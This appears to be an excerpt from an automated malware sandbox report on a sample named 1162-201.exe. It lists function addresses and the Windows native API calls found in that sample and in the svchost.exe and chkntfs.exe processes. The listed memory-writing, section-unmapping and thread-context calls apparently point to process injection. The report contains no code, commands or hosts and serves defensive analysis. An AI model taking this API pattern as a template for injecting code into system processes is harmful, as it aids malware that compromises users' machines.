                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D0D3 NtClose,2_2_0042D0D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,2_2_032735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,2_2_03272BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,2_2_03272AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,2_2_03272F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,2_2_03272F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,2_2_03272FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,2_2_03272EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,2_2_03272E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,2_2_03272D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,2_2_03272DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,2_2_03272CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C4650 NtSuspendThread,LdrInitializeThunk,6_2_044C4650
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C4340 NtSetContextThread,LdrInitializeThunk,6_2_044C4340
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2C60 NtCreateKey,LdrInitializeThunk,6_2_044C2C60
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_044C2C70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_044C2CA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_044C2D10
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_044C2D30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2DD0 NtDelayExecution,LdrInitializeThunk,6_2_044C2DD0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_044C2DF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_044C2EE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_044C2E80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2F30 NtCreateSection,LdrInitializeThunk,6_2_044C2F30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2FE0 NtCreateFile,LdrInitializeThunk,6_2_044C2FE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2FB0 NtResumeThread,LdrInitializeThunk,6_2_044C2FB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2AD0 NtReadFile,LdrInitializeThunk,6_2_044C2AD0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2AF0 NtWriteFile,LdrInitializeThunk,6_2_044C2AF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2B60 NtClose,LdrInitializeThunk,6_2_044C2B60
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_044C2BE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_044C2BF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_044C2BA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C35C0 NtCreateMutant,LdrInitializeThunk,6_2_044C35C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C39B0 NtGetContextThread,LdrInitializeThunk,6_2_044C39B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2C00 NtQueryInformationProcess,6_2_044C2C00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2CC0 NtQueryVirtualMemory,6_2_044C2CC0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2CF0 NtOpenProcess,6_2_044C2CF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2D00 NtSetInformationFile,6_2_044C2D00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2DB0 NtEnumerateKey,6_2_044C2DB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2E30 NtWriteVirtualMemory,6_2_044C2E30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2EA0 NtAdjustPrivilegesToken,6_2_044C2EA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2F60 NtCreateProcessEx,6_2_044C2F60
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2F90 NtProtectVirtualMemory,6_2_044C2F90
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2FA0 NtQuerySection,6_2_044C2FA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2AB0 NtWaitForSingleObject,6_2_044C2AB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C2B80 NtQueryInformationFile,6_2_044C2B80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C3010 NtOpenDirectoryObject,6_2_044C3010
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C3090 NtSetValueKey,6_2_044C3090
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C3D70 NtOpenThread,6_2_044C3D70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C3D10 NtOpenProcessToken,6_2_044C3D10
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024A9B80 NtCreateFile,6_2_024A9B80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024A9E80 NtClose,6_2_024A9E80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024A9FE0 NtAllocateVirtualMemory,6_2_024A9FE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024A9CF0 NtReadFile,6_2_024A9CF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024A9DE0 NtDeleteFile,6_2_024A9DE0
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C8D5EB
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C81201
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C8E8F6
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C920460_2_00C92046
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C280600_2_00C28060
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C291C00_2_00C291C0
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C882980_2_00C88298
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C413940_2_00C41394
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C5E4FF0_2_00C5E4FF
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C5676B0_2_00C5676B
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00CB48730_2_00CB4873
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C4781B0_2_00C4781B
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C3997D0_2_00C3997D
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C279200_2_00C27920
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C2CAF00_2_00C2CAF0
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C4CAA00_2_00C4CAA0
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C47A4A0_2_00C47A4A
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C47CA70_2_00C47CA7
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C3CC390_2_00C3CC39
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C56DD90_2_00C56DD9
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C59EEE0_2_00C59EEE
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_0314D1C00_2_0314D1C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017492_2_00401749
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418FC32_2_00418FC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004109532_2_00410953
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019572_2_00401957
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019602_2_00401960
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E9332_2_0040E933
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171C32_2_004171C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171BE2_2_004171BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040EA782_2_0040EA78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402AC02_2_00402AC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040EA832_2_0040EA83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402ABD2_2_00402ABD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026702_2_00402670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F6B32_2_0042F6B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017602_2_00401760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041072B2_2_0041072B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004107332_2_00410733
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FD02_2_00402FD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA3522_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F02_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033003E62_2_033003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E02742_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C02C02_2_032C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032301002_2_03230100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA1182_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C81582_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F41A22_2_032F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033001AA2_2_033001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81CC2_2_032F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D20002_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032407702_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032647502_2_03264750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C02_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6E02_2_0325C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032405352_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033005912_2_03300591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E44202_2_032E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F24462_2_032F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE4F62_2_032EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB402_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6BD72_2_032F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA802_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032569622_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A02_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A9A62_2_0330A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A8402_2_0324A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428402_2_03242840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268B82_2_032268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8F02_2_0326E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282F282_2_03282F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260F302_2_03260F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E2F302_2_032E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4F402_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEFA02_2_032BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324CFE02_2_0324CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232FC82_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEE262_2_032FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240E592_2_03240E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252E902_2_03252E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCE932_2_032FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEEDB2_2_032FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AD002_2_0324AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DCD1F2_2_032DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258DBF2_2_03258DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323ADE02_2_0323ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240C002_2_03240C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0CB52_2_032E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230CF22_2_03230CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D2_2_032F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C2_2_0322D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A2_2_0328739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A02_2_032452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED2_2_032E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C02_2_0325B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327516C2_2_0327516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1722_2_0322F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B16B2_2_0330B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B02_2_0324B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70E92_2_032F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF0E02_2_032FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF0CC2_2_032EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C02_2_032470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF7B02_2_032FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032856302_2_03285630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F16CC2_2_032F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75712_2_032F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD5B02_2_032DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033095C32_2_033095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF43F2_2_032FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032314602_2_03231460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB762_2_032FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FB802_2_0325FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B5BF02_2_032B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DBF92_2_0327DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B3A6C2_2_032B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA492_2_032FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7A462_2_032F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DDAAC2_2_032DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03285AA02_2_03285AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E1AA32_2_032E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EDAC62_2_032EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D59102_2_032D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032499502_2_03249950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B9502_2_0325B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD8002_2_032AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438E02_2_032438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF092_2_032FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFFB12_2_032FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD22_2_03203FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD52_2_03203FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045424466_2_04542446
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045344206_2_04534420
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0453E4F66_2_0453E4F6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044905356_2_04490535
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045505916_2_04550591
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AC6E06_2_044AC6E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044B47506_2_044B4750
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044907706_2_04490770
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0448C7C06_2_0448C7C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045220006_2_04522000
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045181586_2_04518158
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044801006_2_04480100
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452A1186_2_0452A118
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045481CC6_2_045481CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045441A26_2_045441A2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045501AA6_2_045501AA
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045302746_2_04530274
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045102C06_2_045102C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454A3526_2_0454A352
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045503E66_2_045503E6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449E3F06_2_0449E3F0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04490C006_2_04490C00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04480CF26_2_04480CF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04530CB56_2_04530CB5
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449AD006_2_0449AD00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452CD1F6_2_0452CD1F
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0448ADE06_2_0448ADE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044A8DBF6_2_044A8DBF
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04490E596_2_04490E59
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454EE266_2_0454EE26
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454EEDB6_2_0454EEDB
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454CE936_2_0454CE93
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044A2E906_2_044A2E90
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04504F406_2_04504F40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04532F306_2_04532F30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D2F286_2_044D2F28
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044B0F306_2_044B0F30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04482FC86_2_04482FC8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449CFE06_2_0449CFE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0450EFA06_2_0450EFA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449A8406_2_0449A840
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044928406_2_04492840
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044BE8F06_2_044BE8F0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044768B86_2_044768B8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044A69626_2_044A6962
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044929A06_2_044929A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0455A9A66_2_0455A9A6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0448EA806_2_0448EA80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454AB406_2_0454AB40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04546BD76_2_04546BD7
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044814606_2_04481460
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454F43F6_2_0454F43F
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045475716_2_04547571
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045595C36_2_045595C3
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452D5B06_2_0452D5B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D56306_2_044D5630
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045416CC6_2_045416CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454F7B06_2_0454F7B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044970C06_2_044970C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0453F0CC6_2_0453F0CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454F0E06_2_0454F0E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045470E96_2_045470E9
